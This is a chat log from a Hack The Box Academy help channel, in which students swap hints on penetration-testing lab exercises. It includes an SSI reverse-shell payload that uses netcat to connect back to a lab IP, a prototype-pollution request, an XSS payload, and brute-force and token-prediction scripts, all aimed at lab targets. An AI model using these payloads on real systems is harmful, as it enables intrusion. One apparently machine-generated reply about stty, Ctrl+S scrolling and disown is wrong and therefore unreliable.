#modules
It happens
I ended up cheating my first time through footprinting module, using a gui email client bc I could not figure out the cli. Then went back and breezed through on a second go
Yeah this is my second go as well. It makes so much more sense this time.... i feel like I might actually understand most of this module.
Yeah this module was just boring to me tbh
goodnight i would like to kindly request some assistance in File upload attacks, specifically Blacklist
i’m not at my computer, but have you looked at phpinfo(); to verify system is allowed
@rustic sage no i have not will give it a go
Hi, anyone can help me with WhiteBox Attacks module? Please
I'm stuck in Privilege Escalation section
Think about what exactly is needed to be logged in as admin and then think about how you can "override" that
Broken Authentication
Hi! how you doing? Any hint on this?
how awesome is this OSINT Recon Module? 1000 boxes...
Because some of the fundamentals are advanced concepts
Which rely on some other base knowledge to get started
anyone sanity check on Broken Authentication - Skill Assessment?
i think im filtering properly but i dont find the way
Hey Everyone
I have an issue
LFI and File Uploads module
When i try to upload the shell.gif file i get nothing, the form didn't work
What can i do in this case ?
not completely disagree with this but the tier III modules i've done so far do have a bit more fundamental than advanced stuff
after that part your wordlist should have about ||50|| or under
yea we need a bit more info than that for us to be able to help you
i have 11 users and 12 passwords
the python script i made up is working properly
so idk 🤷♂️
still not sure about this part but when i did this module when it first came out there was like 1 user which is the right one
try burp
what?
Can someone explain to me how exactly, in the context of an unconstrained delegation attack, the KUD-capable machine receives the TGT of the user that is trying to access it? Someone told me i think that it is being passed in the AP-REQ????
i just got this,i can't press upload button
but the part that you are on shouldn't be affected by that
im trying to get the valid user:pass to get in
enumerated users done -> got 11
filtered passwords done -> got 12
none of the combinations work
the cookie tamper is not working because i think there is a protection behind
also i used burp suite to analyze where request go, then i navigate to upload.php and get this error
i also got the cookie part if you are asking
this is how unconstrained delegation https://www.youtube.com/watch?v=xDFRUYv1-eU and for the attacks there should be some blog on thehacker recipes site
oh no there isn't
if this is the case you can skip user and get admin if not you still have to get user first
can i dm coz otherwise im gonna spoil something
sure
because you didn't bypass the filter
first which section are you on? and what did you try?
File Inclusion LFI and File Uploads
here nothing about filter bypassing
i meant about image filters, only how to bypass directory traversal filters
the trick is turn off your brain and do the season, i got that rank without known for like a month or 2
also you know retired machine don't give you point right?
oh my bad give me a sec
oh i thought your main objective was to get the rank but this is way better
just have fun and don't try to get the ranks and soon you will get it
that box foothold is straight forward, haven't done it but i'll do it in a few days so if you are still stuck maybe i can help but i don't take that good of a note for boxes
ok for that section follow the Phar Upload part in that section
i get the same problem
anyone done Linux Privilege Escalation Logrotate recently?
I cant seem to find the standard configuration file /etc/logrotate.conf Do I need to reset the machine?
after uploading you access your shell the same way the section show right?
it's in backups/access.log
Do you mean the log that I need to rotate is the access.log?
yep
Do I need to do anything specific to get the log to rotate?
anyone can check me on the Broken Auth - Skill Assessment, i have the correct password and user list
Figured it out, Thanks MRTom for the directions
hi guys, i have a problem with the Introduction to Academy module, im stuck on the “Interactive Section with Target” section
have you tried interacting with the target?
the browser just doesnt connect
If you're using the in-browser vm then it doesn't have any internet access unless you buy some cubes
On my machine it works perfectly, I can search for the IP address, but on the VM it doesn't let me search for anything, I have tried searching for other domains like YouTube or Google, but it doesn't work
really? So how can I complete it?
Just use your own browser outside it or set up your own vm
Since you don't need any special tools to get the answer just look at the webpage
It's funny, because if I execute the command "ping google.com", for example, it works
The other bonus to buying any amount of cubes OR buying a subscription is that you get unlimited access
The internet access is highly limited
Like restrictively limited
But like I said the recommended thing is to set up your own linux vm and work off that rather than the browser
okay thank you very much!
I use the next payload: ||curl -x POST -d '{"proto": {"isAdmin": true}}' -H "Content-Type: application/json" http://IP:Port/login||
Is it wrong?
- ||I register a new user||
- ||I use the payload||
- ||I enter as my user and try to access the admin dashboard||
- ||Nothing happens|| - ||I feel sad :(||
Yo I'm doing XSS module, the first question, and I'm using the right payload but I get no popup. Idk if its a massive skill issue on my end am I missing smth? Even the example one they give to test for XSS just doesn't work. Confused :/
payload used ||<script>alert(window.origin)</script>||
shit jus don work men 
nvm it was massive skill issue lol
Hey guys, im struggling with the SocksOverRDP section from the pivoting module. The exercise tells us to RDP into 172.16.6.155 but when i try it i get an error, so i tried to rdp into 172.16.5.19 (thinking there was an error with the ip in the exercise) and i get the authentication prompt but login doesn't work.
Do u have an idea ?
Follow the pivoting steps exactly as described in the section
You go from foothold -> machine1 -> machine2
You do have the credentials as well for that middle ip
Where you set up the proxifier tool
You have to load the socksoverrdp dll first
anyone with access to the broken auth skill assessment for a check?i have the correct lists of password and users but my python script says NO to every combination xD
Then your script sucks :^>
it is good
coz i solved it with burp
why cant i solve it with python
if it does the same
forgot a cookie or csrf or a missing header?
URL encoding the wrong chars? have you tried looking at your queries through burp or wireshark
Welp that would do it
At least you figured it out
Hello everyone!
Can someone help me, I am in "Attacking enterprise network" module.
Third question of this module giving me headache
"What is the FQDN of the associated subdomain?"
It's been 5 hour I can't find anything I am stuck.
First i tried nslookup, I thought it was inlanefreight.local but answer is wrong
I tried to zone transfer, brute forcing, subdomain enumeration I can't find anything. I even tried to enter any subdomain that I found. Still failed i need help
Google what a fqdn is, you're already told that it's related to the subdomain. So x.inlanefreight.local
Fully Qualified Domain Name
Inlanefreight.local is the overall domain
But it's being specific about the subdomain: so start there
I did it!
I already searched, I tried to read anything about FQDN, i thought it was monitoring or blog. But these are not answer. Last time i tried to enter any subdomain that i found. I used Namelist.txt, top 1 million 110000 wordlists to brute force then I try to enter anything that i found still failed
It's crazy i am missing something
associated subdomain might be another look into it
So it's directly related to what you're looking at
usually i use ffuf -w /usr/share/spiderfoot/spiderfoot/dicts/subdomains-10000.txt -u http://10.129.201.90 -H 'HOST: FUZZ.inlanefreight.local' -fs 46166 for subdomain enum, adjust per target
What was the outcome?
Should probably take to dms because spoilers
it was not the urlencode, i was a little worried about that because in data sent via POST method you do not need urlencode
it was the "\n" character from each line
You're not wrong, a UD configured machine will act on behalf of the user that has authenticated to it. It keeps a copy of the TGT stored in itself when a user requests a ticket from the KDC, so that it can later request service tickets using the copy of the TGT and doesn't require the user to constantly have to request service tickets.
So compromising the UD configured machine means you can access TGT stored when a user or machine account authenticates to it.
Im working on Windows fundamentals.
I have spun up the Windows target machine and connected to it via FreeRDP, but i cant ping it or use smbclient to fulfill the task.
This is the error: (Error NT_STATUS_IO_TIMEOUT)
Either i didnt understand the exercise or im missing something else. Any advice?
Have you checked you're looking at the right share? smbclient -L //ip/ will list the available shares
smbclient -L //10.129.157.173/
do_connect: Connection to 10.129.157.173 failed (Error NT_STATUS_IO_TIMEOUT)
I tried restarting already.
How would I check if the share is running?
Idk follow the section step by step
I disabled the firewall, now it works as intended. Thank you
is it only me or every target spawn can't respond to anything for any section?
Are you connected to the vpn?
👍
So I made a little note on this topic which is basically a summary of a great video @MR.tom#1775 sent to me earlier. In case anyone wants to refresh this topic fast
- If in KRB-TGS-REQ the KDC notices that KDC-REQ-BODY -> sname contains a name of a service that has the UAC TRUSTED_FOR_DELEGATION privilege, the KDC will add enc-part -> EncTGSRepPart (encrypted with user session key) -> flags -> ok-as-delegate in the TGS-REP
- If in the first KRB-TGS-REP the client notices enc-part -> EncTGSRepPart (encrypted with user session key) -> flags -> ok-as-delegate, the client will send a second KRB-TGS-REQ request requesting a delegation TGT (TGT with KDC-REQ-BODY -> kdc-options -> forwarded)
- The server will reply with KRB-TGS-REP containing enc-part -> EncTGSRepPart (encrypted with user session key) -> flags -> forwarded flag and the copy of the TGT that will be used by the account with KUD privileges (delegation TGT)
- The client in the consequent KRB-AP-REQ will send not only the TGS for the service, but also the "delegation TGT" (authenticator -> cksum -> krb-cred -> tickets), the user session key associated with this delegation TGT (authenticator -> cksum -> krb-cred -> enc-part -> cipher -> encKrbCredPart -> ticket-info -> key), and the subkey to decrypt the aforementioned user session key (authenticator -> subkey)
- The service then uses the acquired delegation TGT to make a KRB-TGS-REQ to the KDC
yeah i tried with my kali machine and with the pwnbox but just nmap doesn't work
or it work for like 7 minutes
Well if you're running pwnbox and vpn at the same time it'll be funky
yeah not at the same time of course
Try changing vpn regions and downloading a new config
ok thanks i'll try
Is anyone able to help with the AD Module? Stuck trying to find the ObjectAceType of the forend user's rights over GPO management group.
What do I need to do to verify my account on HTB’s discord
read and follow #welcome
Hello, I apologize for bothering you, but I require assistance with the 'SSI Injection Exploitation Example' module. My reverse shell is not functioning. I've attempted to break it into three pieces, but unfortunately, it's still not working.
This is the RS: "<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->"
Does not work. Then, I broke it in 3 pieces:
<!--#exec cmd="mkfifo /tmp/foo" -->
<!--#exec cmd="nc 10.10.15.199 9090 0</tmp/foo | /bin/bash 1>/tmp/foo" -->
<!--#exec cmd="rm /tmp/foo" -->
No success
that copycat forum was so (r word)ed i'm not even sure if it's a serious rule break
sure which section?
Got it, thanks tho!
hello guys im back
Hii
after a two days break
starting Active Directory Enumeration & Attacks wish me luck
this channel for education purpose
Right now whenever I try to start instances in Academy I get "There are no available instances. Please try again later.".
it's not working for me either
Sorry, I was not online the whole day.
If you still need help, send me a DM
Hi payloadbunny, have you tried the cdsa path?
I am almost done with it
what do you think?
The path is great, but I need more training. I am not a logfile mole yet
did you start with it too?
i cant open my pwnbox "there are no available instances. please try again later." but i am paid member😭
Errors happen, even to paying customers 🤷♂️

I'm p2w and I have the same issue 
im doing the basic LFI module and whenever i try and read /etc/passwd it just hangs?
Just finished Server-side Attacks module and I'm not sure I did the final assessment correctly =/ Was I supposed to look for something on port 8080? I simply found a JS script, got the link from it
weird, it works on pwnbox but VPN just hangs
Try to change the VPN Region
I have had a lot of success with this command: sudo ifconfig tun0 mtu 1200
or maybe its mtu tun0?
try both 😄
has been working fine for months on other modules, so will have a look if the problem continues
thanks guys
Hi, got issue with crackmapexec in kali 2023 , it echo nothing with smb bruteforce
anyone know about it ?
can't send image here
just drop the output of the cmnd
Does anyone know of AI thats used for cyber security type things ? Like an AI assistant that in real time analyzes what your doing and gives information, tips, possible infection strategies etc
can you copy paste the cmnd u used
btw guys what is ur review about this module what is the best part and where i need to pay a lot of attention
what module?
No one can help without knowing what command you used and what you're trying to do
ACTIVE DIRECTORY ENUMERATION & ATTACKS
u can dm me with screen shot
and i ll put it here if u want
I don't know what to tell you, pretty much everything in that module is important
crackmapexec smb -i 10.10.10.184 -u users.txt -p pass.txt
i agree with @hallow kiln everything is important (obviously)
i'm actually redoing that module now since i've finished the path🤷♂️
crackmapexec doesn't use an -i flag for the IP
feel like there were a few things brushed over (looking at the command cheat sheet) that might come in handy
feel so awkward
thank you guys
this is the reason
you could have googled it, just a tip
I mean if you run the command, it says "crackmapexec smb: error: the following arguments are required: target" which points you in the right direction
another thing is to use the help menu
that is so smart btw
Imagine using a tool's -h flag or man <tool>
tried but missed 😅
why would i do that when i can just chatgpt it🤪 (sarcasm)
unheard of
Very cringe
Is there any way to make the RDP connection more consistent over the vpn? I keep getting failed logins/kicked off mid session
Says the one currently playing cs2
I'll have you know I tried to close it and it won't close
Using the tcp vpn download instead of udp
Thanks dood
😭
It won't even let you force it closed via task manager tho?
hey guys I really cant understand how to do this Can some one help me plz
Haven't tried, gonna hop back on after work teehee c:
I really dont know what should i do to see the Ajp
Also, not sure if I am being a doofus but I'm on Academy and don't see an option to get a TCP vpn connection
click on your profile (top right), click vpn settings
Well considering its saying replicate the steps shown in this section, start there
?
Does anyone know another place to download proxifier? It seems like the og website is not working
not working
Thanks man 🙂
Oh wait
that doesn't work for me
It's fine I figured it out anyway, cheers though
Hi Guys. I am facing some problems with the module Windows Event Logs. Have anyone completed that module ? I might have few questions from them regarding identification of the PRINT Folder access
Hello guys! Im in the final part of the Python3 introductory module! Has anyone done it already?!?
HEY GUYS does anyone know if there are any videos for linux fundamentals which actually read all the modules?
I searched for some over youtube but I couldn't find..
?
read them by yourself maybe
I just understand things better when i hear them 😅
to be fair, there's plenty of videos out there on topics ranging from the basics to more advanced stuff, but also an insane amount of material to read through
in any case, you may find some modules on YouTube, but it's not allowed to post anything above Tier 0, so you'll be back to reading after
if you want video courses, go for TCM, HTB is all reading, all the time
(Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer)
I saw the footprinting-wordlists.txt, but to no avail.
Anyone got ideas?
I am completely out.
what have you done so far?
progress on the 2nd, what did you try
smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.129.187.234
smtp-user-enum (with wordlist)
Auxiliary with nmap.
I found the smtp-enum-users, but I have no idea if that'll help.
Did the open-relay -v as well.
did you try with the wordlist from the module?
tbh I do remember having some issues with that section, what ultimately worked for me was Metasploit's smtp_enum module with the module wordlist
hope it works
Hello, I'm trying to do the Guided Lab for the Active Directory module and when I attempt to RDP into the target machine, I just get a black screen. Any thoughts and is the target actually accessible?
Wait, so smtp enum with footprinting.wordlist?
yep
Hm, aight,will try.
make sure to set the file path to the list correctly in metasploit
which section was that?
When you get a black screen, just hit ENTER and most likely the issue will be solved
I had one machine that did that, had to use remmina
no way to know what's in the works
Windows File Transfer Methods: "Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer." anyone have a clue for this?
under file transfer module
i tried to use curl with ftp and also http but it doesn't work
I am stuck in the last question in Skills Assessment - WordPress , I've tried password attack and searchsploit for plugins . I didn't find anything interesting , any hint ?
Could someone give me a hint for the second question Skills Assessment: Using Crackmapexec?
i think i done it a bit differently but not sure i am right or not. i download the file in my kali machine then i RDP to the target first. next, I download the file from kali
hello. can anyone help me on the Zap section for the Web Proxies module? I think I got the right cookie but when I resend it, there is no flag in the body and the cookie reverts back to the original one.
nevermind its there
I just had to scroll down some wow
You got the user?
have u tried to google the question?
my brain just went boom after SSRF example
is that a docker inside the target?
http://<TARGET IP>/load?q=http://127.0.0.1:PORT in this schema isn't PORT 80 the same port where the web app under <TARGET_IP> is?
?
http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/ here internal.app.local is a web app under a docker instance right? otherwise im not understanding
I mean 1. youre specifying a different port there so yeah thats a different service and 2. even if that wasnt the case, vhost redirects can be at play
but in the 1st q= parameter if i place 127.0.0.1:80 i will get the same resource that is under http://<TARGET_IP> right?
Usually you should. but vhost/url_rewrites can do funky stuff
so id never say never for that
and in the 2nd q the 127.0.0.1 has to be a different network in this case?
Trying to understand how a Fundamentals level Academy has a super simple but challenge breaking JS bug in one of the steps and then the next step says that it seems the page's exercise is broken when it's not.
also when you get the RCE you are inside a docker container
the server should hit the same listening service. but it could just be an apache proxy or such ya know
with ip 172.17.0.3
woah
thats just one example
where is the best place to send bug reports?
another could be if the backend SSRF is sending the requests to an entirely different service in which case 127.0.0.1 would be the IP of the internal server, not the public one anyways.
wdym bugs?
which would be more common for say microservices type stuff
Message support on the website
they used window.onload instead of document.onload in the challenge for https://academy.hackthebox.com/module/35/section/223
thx @thorn urchin
it's not valid js and doesn't cause the page to perform its second get request so that the flag can be discovered via the documentation
I had to find the error log in the console and then navigate to the flag's txt file that should have been rendered onload()
you do not
I will drop a note to support though, thanks Marcie
xD
If you're looking to suggest a change with what you think and can prove should work #858470491676737536
window.onload is valid js
what browser youre using
hmmm, when I searched it up I was finding some stackexchange comments saying it wasn't and didn't push it further, I was using Opera GX so hmm
let me go double check my stream, I clipped it
Opera GX might as well be an obscure browser though
Yeah opera can be 50/50 sometimes
wasnt that the gamer browser?
GamerTM
haha too much lights for me
It's an alright browser
yes
Easy customization
as we said try other browser
HAHAHA
yes I will, but I misspoke, is document.onload valid? the SE comments I found said it had to be executed on an element of the page
Hi guys🫃
Yes
when they changed it to tier 2 ?
firefox:
but it works
it is not saying 404 now
chrome:
does not happen for YOU
but it's supposed to execute a get request
is not a bug
since it isn't happening for others
its a bug when it happens for everyone
Always was afaik
it was tier 3 and it still give back 100 cube , I guess
Interesting, I remember it being tier 2 but you might be right! I unlocked it, need to do it still though
have fun
lol bugged?
that is 100 free cubes 🤣
4 students
Tier 3 does in fact refund 100 cubes
¯_(ツ)_/¯
They maybe forgot to update c00b rewards for it
we won’t say
Shuuut be silence dude
Lol
sry had to jump into a meeting but I can't argue that I'm seeing a second get request and the flag in the response body in chrome so I will play around with it a little bit more for my own understanding
thanks for your insight!
Yeah they changed it to tier 2 a few days ago I noticed
It’s probably because they decided to add it to the new soc fundamentals path, so they had to downgrade it to tier 2 for silver annual / students 🤣
sometimes things get buggy
and yeah I'd consider Opera to be a bit obscure but it's handy to split tunnel VPN with while I stream without impacting my whole system and I wanted to test them out again since they seem to be marketing directly to the gamer crowd and their cpu and ram limiting features seem useful to a tab whore such as myself
I hope they keep the 100 cube x)
It'll probably be updated in 20 business days
Hi All
Someone can help me with Logrotate in Linux Privilege Escalation?
Ask the question/be more specific with the issue you're having
I've done everything from the text and it is not working for me
not sure also why in this machine there is no /etc/logrotate.conf
I find this /snap/lxd/24918/etc/logrotate.conf
/snap/lxd/23889/etc/logrotate.conf
but it looks different
Hi all,
I am working on the following module: https://academy.hackthebox.com/module/144/section/1256
I am stuck on the second question at the moment: Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.
I don't really understand fully what DNS zones are or how to find them -- on my way to find them I was trying to both nslookup and dig the nameserver domain (ns.inlanefreight.htb) but I don't understand why what im doing isnt working.
I am trying to run nslookup ns.inlanefreight.htb -type=any -query=AXFR, however it keeps telling me that the connection to the domain failed, saying it timed out. However, when I replace the query with NS, or don't provide any specific query, it works fine. I have verified that I can ping inlanefreight.htb and ns.inlanefreight.htb, as I have entered these into my hosts file.
Anyone able to provide a little bit of help? Also, I don't understand DNS' inner workings all that well (the records) so it may seem a little stupid haha
I got somewhere by running nslookup -type=any -query=AXFR inlanefreight.htb [SERVER IP]
however, when I try to run the same command but replacing inlanefreight.htb with ns.inlanefreight.htb, it gives me a 'notauth' error server can't find ns.inlanefreight.htb: NOTAUTH
Any ideas here? Im pretty stumped
please help link references
get lost
module chat isnt the place to spam a referral link, even(especially?) a htb referral link

english please
this channel is for HTB academy modules read #welcome and #rules after that use /verify at #bot-commands and ask that at #challenges
The challenge is in spanish, can someone help me please?
if that "challenge" isn't from hackthebox then just don't ask here to take it to #general
Do you know where can I ask? 😭
follow this
Hello everyone, please help me solve Skills Assessment - File Upload Attacks. I read the upload file and the second one where the extensions were written which are on the white list, but I can't upload the file. I tried to create all the extensions with the bash script. Once I managed to upload a file using png, but nothing worked and I know that the script changes the file name to the date, which can be viewed through Burp. Please write. Not personally
Hi Anyone got the idea on how we can purchase cube in academy? (I have added my credit card) But on purchasing the cubes or subscribing it is giving Charge Failed error. There are options like redeeming Voucher, where can I purchase that?
Hello everyone, please provide me with some guidance about the skills assessment for vulnerability assessment, the final openvas part doesn't quite work because i couldnt get openvas to install even following all the steps on my own parrot os machine. everytime i install it, it tells me that i'm missing openvas scanner any idea?
Message support on the website tbh considering this is dealing with your PII and sensitive info
The assessment provides you a box to rdp to that has prepopulated scans if I recall
Sorry not rdp
Connect via browser
yes i opened the browser box, but it doesn't have gvm or openvas preinstalled, when i attempt to install those tools, it tells me that (The following packages have unmet dependencies:
redis-server : Depends: redis-tools (= 5:6.0.16-1+deb11u2) but 5:7.0.10-1~bpo11+1 is to be installed
E: Unable to correct problems, you have held broken packages.)
do you have any pointers? I have a difficult time with DNS, so I really don’t understand what to try next; I tried reviewing the lesson but I didn’t find anything that I didn’t already try
Sir you're misunderstanding
The IP that is from the spawn target has the open-vas installed
Zones are the ones that have SOA entry
ah my apologies, i got it
You connect via browser at https://ip:8080
thank you!
the actual target is described in the question
So an SOA entry is like a link to another DNS server (zone)? I’m having trouble fully understanding zones
I'd recommend using the pre-populated scan data as it can take forever to actually do the scan
ok thanks!
Everything can be answered from there, navigating the ui can be a pain tbh
SOA stores information about a zone. Each zone has exactly 1 SOA record. You can watch some youtube videos about DNS and zone transfer to understand it better
Tbh the modules that include dns stuff don't really go too in-depth with it
Hi guys, need some help. I am currently looking into a reverse shell using netcat, but when I connect to it and try to view any type of file I cannot scroll up in the terminal to view the output of a command. For example when I run the LinEnum script I cannot scroll up in the terminal to view the outputs of the scan. i tried using a python pty shell but it's still the same
and how do I stop a process without killing the shell?
have you tried redirecting the output to a file
To scroll up in the terminal when using reverse shell using netcat, you can use the following command:
stty -ixon
This will enable the XON/XOFF protocol, which allows you to control the flow of data between the terminal and the remote host. To scroll up, you can press Ctrl+S to stop the output of the command, and then press Ctrl+Q to resume the output.
To stop a process without killing the shell, you can use the following command:
disown
This will remove the process from the shell's job list, so it will continue to run even if the shell exits.
Here is an example of how to use the stty and disown commands:
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [any] 4444 (stdin is a tty)
whoami
root
To scroll up and view the output of the whoami command, you can press Ctrl+S, and then press Ctrl+Q.
To stop the whoami command without killing the shell, you can press Ctrl+Z, and then type disown.
Here is an example of how to use the python pty shell to scroll up and view the output of a command:
    import os
    import pty
    import subprocess
    import sys

    def shell():
        master, slave = pty.openpty()
        # apply stty -ixon to the pty; stty configures whatever terminal is on its stdin
        subprocess.run(['stty', '-ixon'], stdin=slave, check=False)
        # attach bash to the slave end of the pty
        p = subprocess.Popen(['bash'], stdin=slave, stdout=slave, stderr=slave)
        try:
            while True:
                data = os.read(master, 1024)  # raw bytes coming out of the pty
                if not data:
                    break
                sys.stdout.buffer.write(data)
                sys.stdout.flush()
        except OSError:
            pass  # Linux raises EIO on the master once the slave side is gone
        finally:
            p.wait()
            os.close(master)
            os.close(slave)

    shell()
This will create a new shell session and enable the XON/XOFF protocol. You can then run any command you want, and you will be able to scroll up and view the output.
To stop the shell session, you can press Ctrl+Z and then type exit.
i think bro just wants to scroll up
you can redirect the output to a file then view that file using the more or less command
Hi, i'm doing the IPMI module of Footprinting and i'm having problems finding the cleartext password. I run the command using "scanner/ipmi/ipmi_dumphashes" and i found only the username and the hash but not the cleartext password like in the example in the module. I tried cracking the hash with hashcat but every time i run the msf "run" the hash change. Can anyone give me a hint?
Identify the hash type and Crack it that way don't use the ?1?1?1?1?1 mask
Can anyone help me with the AERO machine please?
You're not gonna get cleartext, you're gonna have to crack it
thanks
i tried to identify it with hashid but it says unknown hash if i use the entire of it , however if i use only the part after the ":" i got it
So run hashcat against that using the provided wordlist from the module
and cracking it gives me "exhausted" response
Also make sure you're using the right hashcat mode
it is
SHA-1 is mode 100
7300
thx
You can also google
Thanks i got it
SELECT * FROM titles WHERE emp_no > 10000 OR title =! 'Engineer'; is answer
This sentence gives me the answer to how many records are not engineers.
from that sentence i get the correct answer 🤷🏻♂️
note to use NOT LIKE in uppercase since it is MariaDB
Good morning all, would anyone mind helping me with the pivoting lab? I am stuck on the first pivot, meterpreter has tried to spawn over 200 shells and it doesn't seem to be stopping any time soon.
Nevermind I got it, payload was set wrong on meterpreter
For the question "SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts." in the 'Bind Shells' section (https://academy.hackthebox.com/module/115/section/1105),
now that I SSH into my target, bind to a shell and connect to a netcat listener, I'm not sure why I am unable to execute any Linux commands. I would of course execute Linux commands to find the flag.txt file.
Because you didn't properly create a bind shell
See the part : binding a bash shell

The section does walk you through creating and executing the bind shell
Could someone give me a hint for the second question Skills Assessment: Using Crackmapexec?
Hey anyone here that can help with Skill Assessment II for Attacking Common Applications? I'm stuck post Gitlab registration looking for the 3rd VHost
0 idea how i can help you here without spoiler so shoot me a dm if you still need help with that
Okay. So I SSH into the target, issued a payload command like the one in the example, and it says 'permission denied', and they didn't show what permissions you needed in the bash shell section they used in the examples.
Try without sudo
Also change the port
You're trying to bind to a reserved port which requires sudo to do
You can do 8080
Or some other higher numbered port but iirc the first 1024 ports are reserved requiring sudo to override
Okay, I tried it without sudo before (that's why I initially used sudo) and got the same issue. Now I am gonna try port 8080
Your sudo isn't on the nc command btw, every semicolon is a new command
```asm
global _start
section .text
_start:
    mov rax, 2        ; starting value
    mov rcx, 5        ; loop counter: the loop body runs 5 times
loop:
    imul rax, rax, 2  ; multiply rax by 2 (the third operand), not by itself
    loop loop         ; decrement rcx and jump back to the label while rcx != 0
; After 5 doublings rax = 2 * 2^5 = 64, i.e. 0x40 (inspect rax here in gdb).
; Exit cleanly so execution does not run off the end of .text
    mov rdi, rax      ; exit code = rax
    mov rax, 60       ; sys_exit
    syscall
```
This corrected code will loop the "loop" tag 5 times and at the end the value of rax will be 2^5, which is 32. The hex value of rax is 0x20. But it says the answer is wrong. Edit the attached assembly code to loop the "loop" label 5 times. What is the hex value of "rax" by the end?
I feel so stupid that I can't even finish Introduction to Academy 100%. I'm in the interactive section with a target and I can't even figure out how to connect to the target website
once I am in the target machine, I don't need any root permissions right? To find the flag.txt that I need to find
Correct
can someone help
That's the one where they give you ip:port yeah?
yep
Have you tried using a web browser?
I used HTB's VM, my running VM, and my actual PC
ahem think more critically about what I said
I'm not saying using the pwnbox
I'm saying literally use a web browser
Can anyone help me?
I tried a bunch of ways, but right now I typed it without the http:// and it worked
I feel stupid rn
Hello everyone, please help me solve Skills Assessment - File Upload Attacks. I read the upload file and the second one where the extensions on the whitelist were written, but I can't upload the file. I tried to create all the extensions with the bash script. Once I managed to upload a file using png, but nothing worked, and I know that the script changes the file name to the date, which can be viewed through Burp. Please write. Not personally
who can help for this "BROKEN AUTHENTICATION-Predictable Reset Token"
Hint: read the source code of upload.php using the (limited file upload) section, which gives you the complete idea about how the file upload works
I read it
Go through the code again; see the upload directory, the format of file saving and finally the whitelisting.
can you help me
Which module ?
BROKEN AUTHENTICATION-Predictable Reset Token
Sorry, Have not started the module.
you just have to use the given (modify it) python script
The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug.
that is all you need
ok thanks
I did it
but the results are all errors
I've been reading this code for 3 days, I understand that it prohibits the expansion of php files and I understand that it adds a date before the file name
can share the screenshot in DM
i can help you in like 30min if u want
Please write to me in DM because I'm leaving for work right now
i am ready
It says "No Access". Can you tell me what this is?
go over to #welcome verify your account to access other channels
I'm at work now, you can answer in DM
can anyone give me a hand on the LFI Skills assessment,
||I have got the admin page and the log variable and when i try to run anything with the log variable from the index.php or admin page i get nothing returned||
Hey DM me
Module: Attacking Common Applications
Section: ColdFusion - Enumeration and Discovery
Question: I can't use my browser to navigate to IP:5500 as detailed in the module. I see the note in the module that says the VM may take up to 90s to load, but it's been way longer than 90s and I still get a timeout message whenever I try to access the target. I can ping the target just fine.
I have this problem on both PwnBox and my Kali VM
I have been doing this
Thanks I will try this now
Hey there, I'm doing the Broken Authentication path in the academy.
Atm I'm stuck at the first "Predictable Reset Token" exercise.
- I created a token on the website.
- I copied the hash and the date of creation.
- Then I created the PHP script that will run the hashing function on 'htbuser' -> so that I can verify my script is working.
||<?php
function generate_reset_token($username, $timestamp) {
    $token = md5($username . $timestamp);
    return $token;
}
$knownUsername = "htbuser";
// Loop through timestamps within the range
$timestamp = strtotime("2023-10-04 02:22:34pm");
for ($i = -3000; $i <= 3001; $i++) {
    $timestampMilliseconds = intval($timestamp * $i);
    $generatedHash = generate_reset_token($knownUsername, $timestampMilliseconds);
    echo "Generated Hash: " . $generatedHash . "\n";
}
?>
||
The script has a tolerance of +-3 seconds, but I still can't get the correct hash. I have seen a lot of the same problems in the forum, but I found no solutions to the problem.
Any advice?
I used the function from the academy:
<?php
function generate_reset_token($username) {
    $time = intval(microtime(true) * 1000);
    $token = md5($username . $time);
    return $token;
}
And I use *3000 to specify a +- offset value of the timestamp in milliseconds
That's multiplied by 1000 to get to milliseconds from seconds; you want to do that and then also add -3000 to +3000 to get all values in the timeframe
But if you multiply the time stamp with -3000 or 0 you get numbers that are completely off
||
<?php
function generate_reset_token($username, $timestamp) {
    $token = md5($username . $timestamp);
    return $token;
}
$knownUsername = "htbuser";
// Loop through timestamps within the range
$timestamp = strtotime("2023-10-04 03:26:53pm");
for ($i = -3000; $i <= 3001; $i++) {
    $timestampMilliseconds = intval(($timestamp + $i) * 1000);
    $generatedHash = generate_reset_token($knownUsername, $timestampMilliseconds);
    echo "Generated Hash: " . $generatedHash . "\n";
}
?>
||
Changed the function, but still with wrong output 😦
Looking for the hash:
You now add -3000 to 3000 seconds to the time stamp and then make it into a millisecond number
But you want to make the time stamp into a millisecond one and then add -3000 to 3000 milliseconds
OMG
now i got it thanks!
Sometimes I make life difficult for myself 😄 time to catch a break
Hey, question to penetration testing career path students: I am a novice offsec student coming into the penetration testing career path with some very fundamental knowledge. I am not entirely new; I understand basic networking, Linux, web vulnerabilities, etc., but I would still be considered a beginner by every standard. How difficult of a learning curve will this learning path be? A friend of mine tells me that it's significantly more comprehensive than OSCP and that it will be a challenge
How did you get Burp to work? I keep getting:
connect to 127.0.0.1 port 8080 failed: Connection refused
- Failed to connect to 127.0.0.1 port 8080 after 12 ms: Couldn't connect to server
- Closing connection
curl: (7) Failed to connect to 127.0.0.1 port 8080 after 12 ms: Couldn't connect to server
Make sure the Proxy Listeners (Under proxy settings) is showing 127.0.0.1:8080 and the checkbox is checked for the Running column.
In the Windows Privilege Escalation module, Server Operators section, how do you crack the NTLM hash to get the Administrator password? I can crack the one on the page with both hashcat and crackstation, but not the one on the target that I retrieve with secretsdump.py.
Yup, that is set. I can use FoxyProxy through firefox with no issue.
what about /etc/proxychains.conf? Is http 127.0.0.1 8080 added and all other lines underneath the proxy list commented out?
Yes. The only thing different that I see is there is no proxychains.conf but there is a proxychains4.conf where I have made my edits. It reads from that config when running the command.
and you're using proxychains curl http://[server ip]:[port]?
Not 127.0.0.1, but for example: proxychains curl http://google.com
Hi, I read in here https://academy.hackthebox.com/module/143/section/1459 that these methods to bypass AppLocker will be covered later. Searching around, I do not see it in my unlocked CPTS path. Anyone know where it is covered? Thanks
└─$ proxychains curl http://www.google.com
[proxychains] config file found: /etc/proxychains4.conf
